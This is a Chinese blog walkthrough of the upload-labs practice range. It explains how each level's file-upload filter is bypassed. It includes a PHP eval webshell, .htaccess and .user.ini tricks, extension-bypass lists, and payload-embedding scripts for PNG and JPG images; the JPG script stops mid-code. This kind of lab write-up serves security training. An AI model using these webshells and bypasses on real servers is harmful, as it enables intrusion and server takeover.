<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Upload Labs 是一个基于 PHP 编写的开源靶场项目，专门用于模拟和研究文件上传漏洞。它包含多个关卡，每个关卡都模拟了不同的文件上传漏洞场景，旨在帮助用户全面了解文件上传漏洞的原理、利用方法和防御策略。">
<meta property="og:type" content="article">
<meta property="og:title" content="upload-labs靶场通关记录">
<meta property="og:url" content="http://example.com/2024/10/22/upload-labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/index.html">
<meta property="og:site_name" content="Qwen&#39;s blog">
<meta property="og:description" content="Upload Labs 是一个基于 PHP 编写的开源靶场项目，专门用于模拟和研究文件上传漏洞。它包含多个关卡，每个关卡都模拟了不同的文件上传漏洞场景，旨在帮助用户全面了解文件上传漏洞的原理、利用方法和防御策略。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915581.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915884.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915412.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915351.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915697.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915703.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914526.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914749.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914785.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914014.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914396.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914040.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914091.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914203.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914601.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914819.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131913540.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131913292.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131913099.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131912203.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131912712.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131912556.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131911620.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131911041.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131911844.png">
<meta property="article:published_time" content="2024-10-22T11:10:37.000Z">
<meta property="article:modified_time" content="2025-03-13T11:29:14.535Z">
<meta property="article:author" content="Qwen">
<meta property="article:tag" content="web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915581.png">

<link rel="canonical" href="http://example.com/2024/10/22/upload-labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>upload-labs靶场通关记录 | Qwen's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Qwen's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
   <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/10/22/upload-labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar_1.jpg">
      <meta itemprop="name" content="Qwen">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Qwen's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          upload-labs靶场通关记录
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-10-22 19:10:37" itemprop="dateCreated datePublished" datetime="2024-10-22T19:10:37+08:00">2024-10-22</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-03-13 19:29:14" itemprop="dateModified" datetime="2025-03-13T19:29:14+08:00">2025-03-13</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">web安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>Upload Labs 是一个基于 PHP 编写的开源靶场项目，专门用于模拟和研究文件上传漏洞。它包含多个关卡，每个关卡都模拟了不同的文件上传漏洞场景，旨在帮助用户全面了解文件上传漏洞的原理、利用方法和防御策略。</p>
<span id="more"></span>

<p>参考文章：</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/henry666/p/17051491.html">全面了解文件上传漏洞, 通关upload-labs靶场! - 亨利其实很坏 - 博客园</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xiaoyus/articles/18250023">upload-labs通关全教程（建议萌新收藏）Web安全-文件上传漏洞超详细解析 - 白小雨 - 博客园</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/iChet/p/16124082.html">文件上传漏洞之upload-labs靶场通关(20关) - iChet - 博客园</a></p>
<h2 id="对content的过滤"><a href="#对content的过滤" class="headerlink" title="对content的过滤"></a>对content的过滤</h2><p>**&lt;?&#x3D; ?&gt;<strong>与</strong>&lt;?php ?&gt;<strong>与</strong>&lt;script language&#x3D;”php”&gt; &lt;&#x2F;script&gt;**都可以标识php代码。</p>
<p>当文件内容中不能出现&lt;?，&lt;script language&#x3D;”php”&gt;也不能起作用，那么还可以将content进行base64编码，然后借助.htaccess文件解码并解析content。如下：</p>
<figure class="highlight 1c"><table><tr><td class="code"><pre><span class="line">AddType application/x-httpd-php .jt</span><br><span class="line">php_value auto_append_file <span class="string">&quot;php://filter/convert.base64-decode/resource=./1.jt</span></span><br></pre></td></tr></table></figure>

<p>PASS-1</p>
<p><strong>只有前端验证，所以我们先选择<code>.jpg</code>后缀的文件，绕过前端验证，再<code>bp</code>抓包修改后缀便可绕过检查。</strong></p>
<p>选择文件<code>exp.jpg</code>其内容如下，<code>bp</code>抓包修改后缀为<code>.php</code>发送，上传成功</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">GIF89A   <span class="comment">#这里这个不影响</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&quot;shell&quot;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>F12</code>在查看器中找到上传文件的相对路径</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915581.png" alt="image-20241015152329058" style="zoom:50%;" />

<p>在蚁剑中连接成功</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915884.png" alt="image-20241015152616491" style="zoom:50%;" />

<h2 id="MIME验证"><a href="#MIME验证" class="headerlink" title="MIME验证"></a><code>MIME</code>验证</h2><p><strong>添加了<code>MIME</code>信息验证，一般将<code>Content-Type</code>选项修改成<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>这三个中的一个即可。</strong></p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915412.png" alt="image-20241015154351022"></p>
<h2 id="别名替换"><a href="#别名替换" class="headerlink" title="别名替换"></a>别名替换</h2><p><strong>添加了黑名单过滤，不允许上传 <code>.asp .aspx .php .jsp</code>后缀文件，可以通过别名绕过。</strong></p>
<p><code>asp aspx jsp php</code>的别名：</p>
<figure class="highlight smali"><table><tr><td class="code"><pre><span class="line">asa cer cdx</span><br><span class="line">ashx asmx ascx</span><br><span class="line">jspx jspf</span><br><span class="line">php2 php3 php4 php5 phps phtml     Apache服务器可以替换</span><br></pre></td></tr></table></figure>

<h4 id="wp"><a href="#wp" class="headerlink" title="wp"></a><code>wp</code></h4><p><code>bp</code>抓包，添加别名爆破</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915351.png" alt="image-20241015163720337" style="zoom:50%;" />

<p>根据<code>Response</code>状态，确定可用别名，成功上传</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915697.png" alt="image-20241015163919606" style="zoom:50%;" />

<p>在<code>Response</code>中寻找返回的相对路径</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131915703.png" alt="image-20241015164714757" style="zoom:50%;" />

<h2 id="htaccess"><a href="#htaccess" class="headerlink" title=".htaccess"></a><code>.htaccess</code></h2><p><strong>查看源码，发现黑名单过滤了几乎所有可用后缀，此时就要用到<code>.htaccess</code>了，注意<code>.htaccess</code>是一个文件。</strong></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">&quot;.php&quot;</span>,<span class="string">&quot;.php5&quot;</span>,<span class="string">&quot;.php4&quot;</span>,<span class="string">&quot;.php3&quot;</span>,<span class="string">&quot;.php2&quot;</span>,<span class="string">&quot;.php1&quot;</span>,<span class="string">&quot;.html&quot;</span>,<span class="string">&quot;.htm&quot;</span>,<span class="string">&quot;.phtml&quot;</span>,<span class="string">&quot;.pht&quot;</span>,<span class="string">&quot;.pHp&quot;</span>,<span class="string">&quot;.pHp5&quot;</span>,<span class="string">&quot;.pHp4&quot;</span>,<span class="string">&quot;.pHp3&quot;</span>,<span class="string">&quot;.pHp2&quot;</span>,<span class="string">&quot;.pHp1&quot;</span>,<span class="string">&quot;.Html&quot;</span>,<span class="string">&quot;.Htm&quot;</span>,<span class="string">&quot;.pHtml&quot;</span>,<span class="string">&quot;.jsp&quot;</span>,<span class="string">&quot;.jspa&quot;</span>,<span class="string">&quot;.jspx&quot;</span>,<span class="string">&quot;.jsw&quot;</span>,<span class="string">&quot;.jsv&quot;</span>,<span class="string">&quot;.jspf&quot;</span>,<span class="string">&quot;.jtml&quot;</span>,<span class="string">&quot;.jSp&quot;</span>,<span class="string">&quot;.jSpx&quot;</span>,<span class="string">&quot;.jSpa&quot;</span>,<span class="string">&quot;.jSw&quot;</span>,<span class="string">&quot;.jSv&quot;</span>,<span class="string">&quot;.jSpf&quot;</span>,<span class="string">&quot;.jHtml&quot;</span>,<span class="string">&quot;.asp&quot;</span>,<span class="string">&quot;.aspx&quot;</span>,<span class="string">&quot;.asa&quot;</span>,<span class="string">&quot;.asax&quot;</span>,<span class="string">&quot;.ascx&quot;</span>,<span class="string">&quot;.ashx&quot;</span>,<span class="string">&quot;.asmx&quot;</span>,<span class="string">&quot;.cer&quot;</span>,<span class="string">&quot;.aSp&quot;</span>,<span class="string">&quot;.aSpx&quot;</span>,<span class="string">&quot;.aSa&quot;</span>,<span class="string">&quot;.aSax&quot;</span>,<span class="string">&quot;.aScx&quot;</span>,<span class="string">&quot;.aShx&quot;</span>,<span class="string">&quot;.aSmx&quot;</span>,<span class="string">&quot;.cEr&quot;</span>,<span class="string">&quot;.sWf&quot;</span>,<span class="string">&quot;.swf&quot;</span>,<span class="string">&quot;.ini&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>​	<code>.htaccess</code>是<code>Apache</code>服务中的一个配置文件，它负责相关目录下的网页配置。通过<code>.htaccess</code>文件，可以帮助实现：网页<code>301</code>重定向，自定义<code>404</code>错误页面，改变文件拓展名，允许&#x2F;阻止特定用户或者目录的访问，配置默认文档等。</p>
<p>​	常用的<code>.htaccess</code>文件格式如下：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;FilesMatch &quot;exp.jpg&quot;&gt;</span><br><span class="line">	SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure>

<p>​	<code>SetHandler application/x-httpd-php</code>的意思是设置当前目录的所有文件都使用<code>php</code>解析，那么无论上传什么文件，只要符合<code>php</code>语言代码规范，就会被当作<code>php</code>执行。</p>
<p>这一关我本地环境有问题，是在<a target="_blank" rel="noopener" href="http://175.178.67.176:8084/">这里</a>通关的。</p>
<h2 id="user-ini"><a href="#user-ini" class="headerlink" title=".user.ini"></a><code>.user.ini</code></h2><p>引发<code>.user.ini</code>解析漏洞需要以下三个条件：</p>
<ul>
<li>服务器脚本语言为<code>php</code></li>
<li>服务器使用<code>CGI/FastCGI</code>模式</li>
<li>上传目录下有可执行的<code>php</code>文件</li>
</ul>
<p><code>.user.ini</code>利用：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">auto_prepend_file = exp.jpg</span><br></pre></td></tr></table></figure>

<p>上传该<code>.user.ini</code>文件，再上传<code>exp.jpg</code>文件</p>
<h2 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h2><p>源码中没有<code>strtolower()</code>可以利用大小写绕过，<code>strtolower()</code>函数将大写字母转为小写字母。</p>
<h2 id="Pass-0708"><a href="#Pass-0708" class="headerlink" title="Pass-0708"></a><code>Pass-0708</code></h2><p>源码中没有<code>trim()</code>可以空格绕过，没有<code>deldot()</code>可以后缀加点绕过。</p>
<ul>
<li><code>trim()</code>函数会去除字符串中的空格</li>
<li><code>deldot()</code>函数会删除文件名末尾的点</li>
</ul>
<p><strong>注意必须在<code>windows</code>环境下，<code>php</code>版本需为<code>5.3</code>版本，<code>7.3</code>版本不行。</strong></p>
<p>​	如果源码中<code>deldot(),trim()</code>依次存在用来过滤时，如下图，可以使用<code>.php. .</code>的方式绕过，经过两次过滤后剩下的为<code>.php.</code>依然可以绕过黑名单。（在<code>Pass-10</code>中利用此方法通关）</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914526.png" alt="image-20241015225415994" style="zoom:50%;" />

<p>反正就是分析源码，找到绕过方式，如果使用了两次<code>trim()</code>可能要多加一个空格。</p>
<h2 id="DATA"><a href="#DATA" class="headerlink" title="::$DATA"></a><code>::$DATA</code></h2><p>​	在<code>Windows</code>环境下，上传的文件后缀为<code>.php::$DATA</code>时，服务器上会生成一个后缀为<code>.php</code>的文件，其内容与后缀为<code>.php::$DATA</code>的文件的内容一样。</p>
<h2 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h2><p>&#x3D;&#x3D;Pass-11&#x3D;&#x3D;</p>
<p>​	<code>bp</code>改后缀为<code>.pphphp</code>，过滤掉第一个<code>php</code>后，成功上传的文件后缀还是<code>.php</code>；如果改成<code>.phphpp</code>，过滤掉第一个<code>php</code>后，剩下的是<code>.hpp</code>，不可；如果是<code>.phpphp</code>这样，不是双写，不可。</p>
<h2 id="图片马"><a href="#图片马" class="headerlink" title="图片马"></a>图片马</h2><p>​	第<code>14</code>关的检查方式是，通过获取上传文件的内容的前两个字节来判断该文件的类型，也就是通过识别文件头判断文件类型。</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914749.png" alt="image-20241017191720004" style="zoom:50%;" />

<p>​	第<code>15</code>关则是通过获取<code>getimagesize()</code>函数的返回结果来检查文件类型，<code>getimagesize()</code>函数的返回结果中包含文件大小和文件类型。</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914785.png" alt="image-20241017191843665" style="zoom:50%;" />

<p>第<code>16</code>关是通过<code>exif_imagetype()</code>函数来识别文件头。</p>
<p>上面三种检查方法其实都差不多，都可以利用下面两种绕过方法绕过：</p>
<h4 id="添加文件头"><a href="#添加文件头" class="headerlink" title="添加文件头"></a>添加文件头</h4><p>在文件的首行添加<code>GIF89a</code>表示为<code>gif</code>文件，添加<code>PNG</code>文件头表示为<code>png</code>文件</p>
<h4 id="使用copy命令"><a href="#使用copy命令" class="headerlink" title="使用copy命令"></a>使用<code>copy</code>命令</h4><p>在<code>cmd</code>中，执行<code>copy zyt.jpg + exp.php zyt.jpg</code>命令</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914014.png" alt="image-20241017190732155" style="zoom:50%;" />

<p><strong>通关步骤：</strong></p>
<p>先上传下面文件</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914396.png" alt="image-20241017191047498" style="zoom:50%;" />

<p>获取文件路径后配合文件包含漏洞解析脚本</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914040.png" alt="image-20241017191238563" style="zoom:50%;" />

<p>向<code>file</code>传参获取<code>webshell</code></p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914091.png" alt="image-20241017191428286" style="zoom:50%;" />

<h2 id="二次渲染"><a href="#二次渲染" class="headerlink" title="二次渲染"></a>二次渲染</h2><p>&#x3D;&#x3D;Pass-17&#x3D;&#x3D;</p>
<p>本关会先检查文件类型，必须要是不被损坏<code>gif,png,jpg</code>文件，才能上传成功。<br>并且<code>imagecreatefromjpeg()</code>函数会对上传的文件进行二次渲染，保留下来的文件是二次渲染后的文件。<br>最后还要配合文件包含漏洞，解析脚本。</p>
<h4 id="gif"><a href="#gif" class="headerlink" title="gif"></a><code>gif</code></h4><p>直接比较渲染前后的两个文件，找到数据没有发生变化的部分，在渲染前文件中的该部分插入<code>webshell</code>即可。</p>
<p><strong>通关步骤：</strong></p>
<p>上传<code>1.gif</code></p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914203.png" alt="image-20241017212528750" style="zoom:50%;" />

<p>将<code>1.gif</code>与二次渲染后的文件<code>31494.gif</code>比较，找到未变化部分，插入<code>webshell</code></p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914601.png" alt="image-20241017212812152" style="zoom:50%;" />

<p>上传修改后的<code>1.gif</code>，得到二次渲染后的文件<code>32588.gif</code>，现在这个文件中的<code>webshell</code>没有再被修改了</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131914819.png" alt="image-20241017212952403" style="zoom:50%;" />

<p>配合文件包含漏洞成功解析脚本</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131913540.png" alt="image-20241017213048163" style="zoom:50%;" />

<h4 id="png"><a href="#png" class="headerlink" title="png"></a><code>png</code></h4><p><code>ALT+4</code>查看模板运行结果</p>
<p><strong>脚本：</strong></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0x0e</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>,</span><br><span class="line">    <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>,</span><br><span class="line">    <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>,</span><br><span class="line">    <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>,</span><br><span class="line">    <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>,</span><br><span class="line">    <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>,</span><br><span class="line">    <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>,</span><br><span class="line">    <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> &lt; <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) &#123;</span><br><span class="line">    <span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line">    <span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line">    <span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line">    <span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line">    <span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>), <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">imagepng</span>(<span class="variable">$img</span>,<span class="string">&#x27;./1.png&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>0</code>传函数名，<code>1</code>传参数。</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131913292.png" alt="image-20241018210855348" style="zoom:50%;" />

<h4 id="jpg"><a href="#jpg" class="headerlink" title="jpg"></a><code>jpg</code></h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">    The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().</span></span><br><span class="line"><span class="comment">    It is necessary that the size and quality of the initial image are the same as those of the processed image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">    1) Upload an arbitrary image via secured files upload script</span></span><br><span class="line"><span class="comment">    2) Save the processed image and launch:</span></span><br><span class="line"><span class="comment">    jpg_payload.php &lt;jpg_name.jpg&gt;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">    In case of successful injection you will get a specially crafted image, which should be uploaded again.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">    Since the most straightforward injection method is used, the following problems can occur:</span></span><br><span class="line"><span class="comment">    1) After the second processing the injected data may become partially corrupted.</span></span><br><span class="line"><span class="comment">    2) The jpg_payload.php script outputs &quot;Something&#x27;s wrong&quot;.</span></span><br><span class="line"><span class="comment">    If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">    Sergey Bobrov <span class="doctag">@Black</span>2Fan.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">    See also:</span></span><br><span class="line"><span class="comment">    https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line"></span><br><span class="line">    <span class="variable">$miniPayload</span> = <span class="string">&quot;&lt;?=phpinfo();?&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">extension_loaded</span>(<span class="string">&#x27;gd&#x27;</span>) || !<span class="title function_ invoke__">function_exists</span>(<span class="string">&#x27;imagecreatefromjpeg&#x27;</span>)) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;php-gd is not installed&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$argv</span>[<span class="number">1</span>])) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;php jpg_payload.php &lt;jpg_name.jpg&gt;&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">set_error_handler</span>(<span class="string">&quot;custom_error_handler&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span>(<span class="variable">$pad</span> = <span class="number">0</span>; <span class="variable">$pad</span> &lt; <span class="number">1024</span>; <span class="variable">$pad</span>++) &#123;</span><br><span class="line">        <span class="variable">$nullbytePayloadSize</span> = <span class="variable">$pad</span>;</span><br><span class="line">        <span 